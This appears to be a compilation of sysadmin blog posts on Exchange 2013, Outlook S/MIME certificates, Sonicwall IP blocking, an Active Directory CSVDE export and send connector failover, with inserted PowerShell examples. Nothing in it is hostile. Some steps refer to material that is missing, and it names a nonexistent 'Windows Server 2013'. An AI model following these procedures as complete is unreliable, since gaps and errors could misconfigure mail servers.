• -click YOUR CERTIFICATES (at the top).
• -click BACKUP (at the bottom).
• -save the certificate to your DESKTOP.
• -type in a password so it can't be used elsewhere.
• -it should save it as something like "foo.p12"

Great! You have the certificate on your system. Now we have to install it.

### Install the Personal Email Certificate on MAC OS X (not needed on Windows 10)

Let's install the Personal Email Certificate.
(FYI - this is for a MAC OS X system.)

• -click GO > UTILITIES > KEYCHAIN ACCESS
• -click FILE > IMPORT ITEMS (at the top menu).
• -select the file "foo.p12"
• -select LOGIN (next to "Destination Keychain").
• -click OPEN.
• -type in the password for the certificate.
• -type in the password for the keychain (if required).

That's it! It should save the certificate in the correct spot.

### Get OUTLOOK to Use the Personal Email Certificate

Now we have to get OUTLOOK to use the Personal Email Certificate.

This is for a MAC OS X system / OUTLOOK 2011:

• -click TOOLS (at the top) > ACCOUNTS > ADVANCED (at the bottom).
• -click SECURITY (at the top).
• -find the top section called DIGITAL SIGNING.
• -click SIGN OUTGOING MESSAGES.
• -click OK (at the bottom).

This is for WINDOWS 10 / OUTLOOK 2016:

• -open OUTLOOK 2016
• -click FILE > OPTIONS
• -click TRUST-CENTER (on the left-hand side).
• -click TRUST-CENTER-SETTINGS (bottom-right).
• -click EMAIL-SECURITY (left-hand side).
• -find DIGITAL-ID'S (CERTIFICATES) section
• -click IMPORT/EXPORT
• -find the .p12 file.
• -type in the password that you created for the file.
• -click OK.
• -checkmark ADD DIGITAL SIGNATURE TO OUTGOING MESSAGES.
• -click OK > OK.

That should do it! Your certificate is installed and people will get a little cool lock that indicates that email messages from you are really yours. This gives confidence to your readers that you are who you say you are and that you really are smart and conscientious about security! Good job!

## Exchange 2013: Blank Page After Login | An error occurred while using SSL configuration for endpoint 0.0.0.0:444

As title says, blank page after login to the EAC. Or the OUTLOOK clients can't connect. Or the IPHONE clients can't connect. Or the Exchange Management Shell Fails to connect.

Looking in the WINDOWS-LOGS > SYSTEM, I see, "An error occurred while using SSL configuration for endpoint 0.0.0.0:444."

This happens because EXCHANGE screwed up its binding to the SSL CERTIFICATE.

First, make sure you know what SSL CERTIFICATE the EXCHANGE should be using. You can see a list of SSL CERTIFICATES in IIS:

• -open IIS MANAGER.
• -click SERVER CERTIFICATES.

You want to make sure that it is issued by a TRUSTED SOURCE (like GoDaddy, GlobalSign, Comodo, Symantec). Also, make sure that all the appropriate alternative names are in the certificate (like autodiscover., computer-name., www., mail., webmail., null)

Once you know which certificate you want to use:

• -open IIS MANAGER.
• -browse to the "Exchange Back End" website.
• -click Bindings (on the right-hand side).
• -mark the "https" binding (normally on port 444) and click Edit...
• -change to the correct certificate.
• -click OK > CLOSE.
• -click server name (on the left-hand side).
• -restart IIS.

That should do it. Sometimes the binding to the SSL CERTIFICATE gets screwed up. There are other threads out there talking about "netsh http show sslcert" and to "netsh http add sslcert ipport" but this doesn't change it to the correct SSL CERT. Changing it to another SSL CERT is simply guessing which is an overall bad idea. We need to understand the problem.
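To see what the binding actually points at before changing anything, the following added example (not part of the original post) reads the certificate bound to the "Exchange Back End" https binding and checks that it exists in the machine store, has a private key, and has not expired. The variable names are this example's own; the site name and port come from the steps above.

```powershell
# Added example: inspect the certificate bound to the Exchange Back End site.
# Run in an elevated Windows PowerShell session on the Exchange server.
Import-Module WebAdministration

$siteName = 'Exchange Back End'   # site name from the steps above
$port     = 444                   # port from the event log message

# bindingInformation has the form IP:port:hostname, e.g. "*:444:"
$binding = Get-WebBinding -Name $siteName -Protocol https |
    Where-Object { $_.bindingInformation -like "*:${port}:*" } |
    Select-Object -First 1
if (-not $binding) { throw "No https binding on port $port for '$siteName'." }

$thumbprint = $binding.certificateHash
$storeName  = $binding.certificateStoreName
if (-not $thumbprint) { throw "The binding on port $port has no certificate assigned." }

# Look the bound thumbprint up in the machine store named by the binding.
$cert = Get-ChildItem -Path "Cert:\LocalMachine\$storeName" |
    Where-Object { $_.Thumbprint -eq $thumbprint }

if (-not $cert) {
    # A binding that references a certificate missing from the store cannot work.
    Write-Warning "Binding points at $thumbprint, which is not in LocalMachine\$storeName."
} else {
    [pscustomobject]@{
        Subject       = $cert.Subject
        Issuer        = $cert.Issuer
        Thumbprint    = $cert.Thumbprint
        NotAfter      = $cert.NotAfter
        Expired       = $cert.NotAfter -lt (Get-Date)
        HasPrivateKey = $cert.HasPrivateKey
        DnsNames      = ($cert.DnsNameList | ForEach-Object { $_.Unicode }) -join ', '
    } | Format-List
}

# What HTTP.sys itself has registered for the same endpoint.
netsh http show sslcert "ipport=0.0.0.0:$port"
```

If the thumbprint is missing from the store, or the certificate is expired or has no private key, that explains the error and tells you which certificate to select in the Bindings dialog.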

## Block Messages to Exchange Group Except From Certain Domains

Let's say you have a group called "Everyone". But you only want internal people to be able to email the group and possibly another company.

There are some other parameters in there too but that should do it.

If you want to do it visually:

• -open the EAC.
• -click MAIL-FLOW (on the left-hand side).
• -click NEW.
• -type: A-NAME-FOR-THE-RULE
• -click THE MESSAGE > THE TO BOX CONTAINS.
• -search for GROUP-NAME.
• -BLOCK THE MESSAGE > REJECT THE MESSAGE AND INCLUDE EXPLANATION.
• -type UNKNOWN USER or some other explanation.
• -click MORE OPTIONS.
• -click THE SENDER > DOMAIN IS
• -type: domain1.com
• -click +
• -and so on.
• -click OK > SAVE (at the bottom).
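The same rule from the Exchange Management Shell, as an added example (not the original post's command). It assumes the sender domains are entered as an exception to the reject action; the rule name and domain2.com are hypothetical, while the group name "Everyone" and domain1.com come from the text above.

```powershell
# Added example; run in the Exchange Management Shell.
$ruleName = 'Restrict senders to Everyone'   # hypothetical rule name

# Create the rule in audit mode first: it is evaluated and the result is
# written to the message tracking log, but nothing is rejected yet.
New-TransportRule -Name $ruleName `
    -AnyOfToHeader 'Everyone' `
    -ExceptIfSenderDomainIs 'domain1.com', 'domain2.com' `
    -RejectMessageReasonText 'Unknown user' `
    -Mode Audit

# Review what was created before it starts rejecting mail.
Get-TransportRule -Identity $ruleName |
    Format-List Name, State, Mode, AnyOfToHeader, ExceptIfSenderDomainIs, RejectMessageReasonText

# Once the audit results look right, enforce the rule.
Set-TransportRule -Identity $ruleName -Mode Enforce
```

The condition mirrors the GUI's "To box" test, so it does not match when the group is placed in Cc; `-AnyOfToCcHeader` checks both headers.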

## Block IP Address on Sonicwall

Let's say you have an IP ADDRESS on the WAN trying to perform a DDOS or a SYN-FLOOD attack to your location. Even though you have the DDOS attack proxied via FIREWALL-SETTINGS > FLOOD-PROTECTION as "Proxy WAN client connection when attack is suspected", you still want to send a message that these types of activities will not be tolerated.

Or you find out that the WAN IP ADDRESS is most definitely malicious as in the following IP from OFFSHORE RACKS: 181.174.167.251

This IP ADDRESS happens to be a Russian forum for DARKMONEY.CC. I can't even read the web site. It's irrelevant at this point. I know it's malicious.

### To block the WAN IP ADDRESS:

• -set the "Zone" as WAN.
• -Navigate to the Firewall > Access Rules page.
• -Select the WAN to LAN button to enter the Access Rules (WAN > LAN) page.
• -Select DENY as the Action.
• -Select ANY as the Service
• -Select Source as the address object or group created earlier.
• -Select ANY as the Destination

The above is adapted from here:
https://support.software.dell.com/kb/sw9982

The REAL-TIME-DEMO can be accessed here:
https://realtime.demo.sonicwall.com/main.html

## Collect Computer Names from Windows Server 2013

Here's an interesting one to collect all computer names in the active directory. Run from CMD:

CSVDE -f adexport.csv -r objectClass=computer -l "DN,cn,objectClass,lastLogon,lastLogonTimestamp,pwdLastSet,userAccountControl,operatingSystem,operatingSystemVersion,whenCreated,description"

## Exchange 2013 Send Connector Load Balancing and Failover

In my recent article USING MANDRILL WITH EXCHANGE 2013, I show how to add Mandrill to Exchange as a SEND CONNECTOR. Further questions become:

1: How do I use it as a load balancer? In other words, how do I set it up so that some of the email goes through the second SEND CONNECTOR?

2: How do I use it as a failover? In other words, how do I set it up so that if the first SEND CONNECTOR doesn't route email, it re-routes through the second SEND CONNECTOR?

The problem is this: multiple equal cost send-connectors will not balance. Or as I read, "When the cost of the Send Connectors and the proximity to their source servers are the same, Exchange will simply choose the one with the alphanumerically lower connector name, and will not load balance the outgoing email across both connections."

The actual way to load balance is to configure multiple smart hosts on a single Send Connector; the outgoing email will then be correctly load balanced.

The problem becomes, if you try this in reality, you must use the same USERNAME & PASSWORD for all SMARTHOSTS, which isn't a possibility. And secondly, you cannot load balance both the local connection and a smarthost.

One approach is to create a fake domain in DNS, let's say smarthost.local, and then create A records in this zone for each SMTP smarthost (i.e. mail.oxford.smarthost.local). Then create an MX record for your first site (oxford.smarthost.local MX 10 mail.oxford.smarthost.local). Repeat for each site, where oxford is the site name of the first site in this example.

Then you create second MX records, lower priority, in any site but use the A record of a smarthost in a different site (oxford.smarthost.local MX 20 mail.cambridge.smarthost.local).

Then add oxford.smarthost.local as the target smarthost in the send connector. Exchange will look up the address in DNS (MX first, A record second, IP address last), so it will find the MX record and resolve the A records for the highest priority for the domain and then round-robin across these A records.

### Failover

Failover seems to be answered via the same path. The idea is to create 1 send connector. The first MX record in the fake SMARTHOST in the SEND-CONNECTOR is back to the local system. The second MX record in the fake SMARTHOST is to the remote SMARTHOST.

First of all, ensure you have DNS A records for your mail gateways in place. Next, come up with a random name for your soon-to-be-created MX record in DNS. In this example, I chose allsmarthosts.forest1.local. Create the required MX records in DNS.

As with plain MX-based routing, Exchange will use the MX record with the higher priority, as long as it’s available. Now the only thing left to do is to reconfigure the Exchange Send Connector to read allsmarthosts.forest1.local as the only smart host.

By doing so, Exchange will use primary.forest1.local for outbound mail, as long as it’s available. Once it goes down or becomes unreachable, Exchange will start using secondary.forest1.local as the smart host. That’s what a little DNS trickery can do for you.
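The failover records described above, as an added example that is not part of the original post (the load-balancing variant uses the same cmdlets with its own zone and host names). It assumes the forest1.local zone and the A records for primary.forest1.local and secondary.forest1.local already exist; the preference values 10 and 20 and the send connector name are hypothetical.

```powershell
# Added example. The DNS steps run on a DNS server hosting the zone
# (DnsServer module); the last step runs in the Exchange Management Shell.
$zone     = 'forest1.local'
$mxName   = 'allsmarthosts'
$gateways = @(
    @{ Target = 'primary.forest1.local';   Preference = 10 }   # lowest number is tried first
    @{ Target = 'secondary.forest1.local'; Preference = 20 }   # used when the primary is unreachable
)

# Create one MX record per gateway under the same name.
foreach ($gw in $gateways) {
    Add-DnsServerResourceRecordMX -ZoneName $zone -Name $mxName `
        -MailExchange $gw.Target -Preference $gw.Preference
}

# Verify what a resolver returns and whether each gateway answers on SMTP.
Resolve-DnsName -Name "$mxName.$zone" -Type MX |
    Where-Object { $_.NameExchange } |          # keep only the MX answers
    Sort-Object Preference |
    ForEach-Object {
        $smtp = Test-NetConnection -ComputerName $_.NameExchange -Port 25
        [pscustomobject]@{
            Preference = $_.Preference
            Exchange   = $_.NameExchange
            SmtpOpen   = $smtp.TcpTestSucceeded
        }
    }

# Point the send connector at the MX name as its only smart host.
# 'Outbound via smart host' is a hypothetical connector name.
Set-SendConnector -Identity 'Outbound via smart host' -SmartHosts "$mxName.$zone"
```

In MX terms the record with the lowest preference number has the highest priority, so primary.forest1.local is the first row of the verification output.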

### Conclusion

The idea of this is to use MANDRILL if for some reason mail is not being sent through the local connection (for example, blacklist). I didn't implement the solutions above simply because I don't think it will work with a SMARTHOST that requires a USER/PASS. I'm not willing to try. That's suicide by client.

In the end, software is set to work in a certain way. When it doesn't, trying to find workarounds is nearly impossible and seemingly pointless. The end result is that EXCHANGE 2013 isn't set to work this way. I wanted this to happen automatically. Since it doesn't, I'll just have to manually switch SEND CONNECTORS if the need arises. Maybe it doesn't matter a whole lot in an ever-increasing cloud world.

